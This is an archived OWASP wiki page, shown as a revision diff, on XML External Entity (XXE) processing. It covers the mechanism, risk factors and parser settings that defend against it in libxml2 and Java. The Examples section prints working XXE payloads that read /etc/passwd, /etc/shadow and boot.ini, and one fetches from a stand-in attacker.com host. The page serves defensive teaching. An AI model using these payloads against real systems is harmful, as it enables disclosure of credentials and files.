This site is the archived OWASP Foundation Wiki and is no longer accepting Account Requests.
To view the new OWASP Foundation website, please visit https://owasp.org

Difference between revisions of "XML External Entity (XXE) Processing"

From OWASP
Jump to: navigation, search
(Initial XXE vulnerability.)
 
(Added libxml2 and minor update to control doc)
Line 64: Line 64:
 
==Related [[Controls]]==
 
==Related [[Controls]]==
  
If possible, disallow tainted data within the DTD of an XML document. If the full XML document is tainted data, the XML processor should be configured to use a local static DTD and disallow any declared DTD returned by the XML document.
+
Since the whole XML document is communicated from an untrusted client, it's not usually possible to selectively [[Input Validation|validate]] or escape tainted data within the system identifier in the DTD. Therefore, the XML processor should be configured to use a local static DTD and disallow any declared DTD returned by the XML document.
  
 
Testing ought to occur with specific implementations for any controls documented below.
 
Testing ought to occur with specific implementations for any controls documented below.
 +
 +
===C/C++==
 +
 +
====libxml2====
 +
 +
The Enum [http://xmlsoft.org/html/libxml-parser.html#xmlParserOption xmlParserOption] should not have the following options defined:
 +
 +
* XML_PARSE_NOENT: Expands entities and substitutes them with replacement text
 +
* XML_PARSE_DTDLOAD: Load the external DTD
  
 
===Java===
 
===Java===
Line 101: Line 110:
 
==References==
 
==References==
  
* [http://cwe.mitre.org/data/definitions/611.html CWE 611].
+
* [http://cwe.mitre.org/data/definitions/611.html CWE-611: Information Exposure Through XML External Entity Reference].
 +
* [http://cwe.mitre.org/data/definitions/827.html CWE-827: Improper Control of Document Type Definition]
 
* [https://www.owasp.org/images/5/5d/XML_Exteral_Entity_Attack.pdf XML External Entity Attacks]
 
* [https://www.owasp.org/images/5/5d/XML_Exteral_Entity_Attack.pdf XML External Entity Attacks]
 
* [http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-3489 PostgreSQL XXE vulnerability]
 
* [http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-3489 PostgreSQL XXE vulnerability]

Revision as of 16:46, 30 December 2012

This is a Vulnerability. To view all vulnerabilities, please see the Vulnerability Category page.

Last revision (mm/dd/yy): 12/30/2012

Vulnerabilities Table of Contents

Description

Processing of an external entity containing tainted data may lead to disclosure of confidential information and other system impacts.

The XML 1.0 standard defines the structure of an XML document. The standard defines a concept called an entity, which is a storage unit of some type. There exists a specific type of entity, an external general parsed entity often shortened to an external entity, that can access local or remote content via a declared system identifier. The system identifier is assumed to be a URI that can be dereferenced (accessed) by the XML processor when processing the entity. The XML processor then replaces occurrences of the named external entity with the contents dereferenced by the system identifier. If the system identifier contains tainted data and the XML processor dereferences this tainted data, the XML processor may disclose confidential information normally not accessible by the application.

Attacks can include disclosing local files, which may contain sensitive data such as passwords or private user data, using file: schemes or relative paths in the system identifier. Since the attack occurs relative to the application processing the XML document, an attacker may use this trusted application to pivot to other internal systems, possibly disclosing other internal content via http(s) requests. In some situations, an XML processor library that is vulnerable to client-side memory corruption issues may be exploited by dereferencing a malicious URI, possibly allowing arbitrary code execution under the application account. Other attacks can access local resources that may not stop returning data, possibly impacting application availability if too many threads or processes are not released.

Risk Factors

  • The application parsers XML documents.
  • Tainted data is allowed within the system identifier portion of the entity, within the document type declaration (DTD).
  • The XML processor is configured to validate and process the DTD.
  • The XML processor is configured to resolve external entities within the DTD.

Examples

The examples below are from Testing for XML Injection (OWASP-DV-008).

Accessing a local resource that may not return

<?xml version="1.0" encoding="ISO-8859-1"?>
 <!DOCTYPE foo [  
  <!ELEMENT foo ANY >
  <!ENTITY xxe SYSTEM "file:///dev/random" >]><foo>&xxe;</foo>

Disclosing the /etc/passwd file


 <?xml version="1.0" encoding="ISO-8859-1"?>
 <!DOCTYPE foo [  
   <!ELEMENT foo ANY >
   <!ENTITY xxe SYSTEM "file:///etc/passwd" >]><foo>&xxe;</foo>

 <?xml version="1.0" encoding="ISO-8859-1"?>
 <!DOCTYPE foo [  
   <!ELEMENT foo ANY >
   <!ENTITY xxe SYSTEM "file:///etc/shadow" >]><foo>&xxe;</foo>

 <?xml version="1.0" encoding="ISO-8859-1"?>
 <!DOCTYPE foo [  
   <!ELEMENT foo ANY >
   <!ENTITY xxe SYSTEM "file:///c:/boot.ini" >]><foo>&xxe;</foo>

 <?xml version="1.0" encoding="ISO-8859-1"?>
 <!DOCTYPE foo [  
   <!ELEMENT foo ANY >
   <!ENTITY xxe SYSTEM "http://www.attacker.com/text.txt" >]><foo>&xxe;</foo>

Related Attacks

Related Vulnerabilities

Related Controls

Since the whole XML document is communicated from an untrusted client, it's not usually possible to selectively validate or escape tainted data within the system identifier in the DTD. Therefore, the XML processor should be configured to use a local static DTD and disallow any declared DTD returned by the XML document.

Testing ought to occur with specific implementations for any controls documented below.

=C/C++

libxml2

The Enum xmlParserOption should not have the following options defined:

  • XML_PARSE_NOENT: Expands entities and substitutes them with replacement text
  • XML_PARSE_DTDLOAD: Load the external DTD

Java

JAXP DOM and DocumentBuilderFactory

The DocumentBuilderFactory setFeature method allows a developer to control which implementation-specific XML processor features are enabled or disabled. Each XML processor implementation has its own features that govern how DTDs and external entities are processed.

Xerces 1 Features:

  • Do not include external entities by setting this feature to false.

Xerces 2 Features:

  • Disallow an inline DTD by setting this feature to false.
  • Do not include external entities by setting this feature to false.

JAXP SAX and SAXParserFactory

The SAXParserFactory setFeature method allows a developer to control which implementation-specific XML processor features are enabled or disabled. Each XML processor implementation has its own features that govern how DTDs and external entities are processed.

Xerces 1 Features:

  • Do not include external entities by setting this feature to false.

Xerces 2 Features:

  • Disallow an inline DTD by setting this feature to false.
  • Do not include external entities by setting this feature to false.

StAX and XMLInputFactory

The StAX XMLInputFactory can allow properties and features to be set.

Disallow Resolving of External Entities:

  • Set the "javax.xml.stream.isSupportingExternalEntities" property to false.

References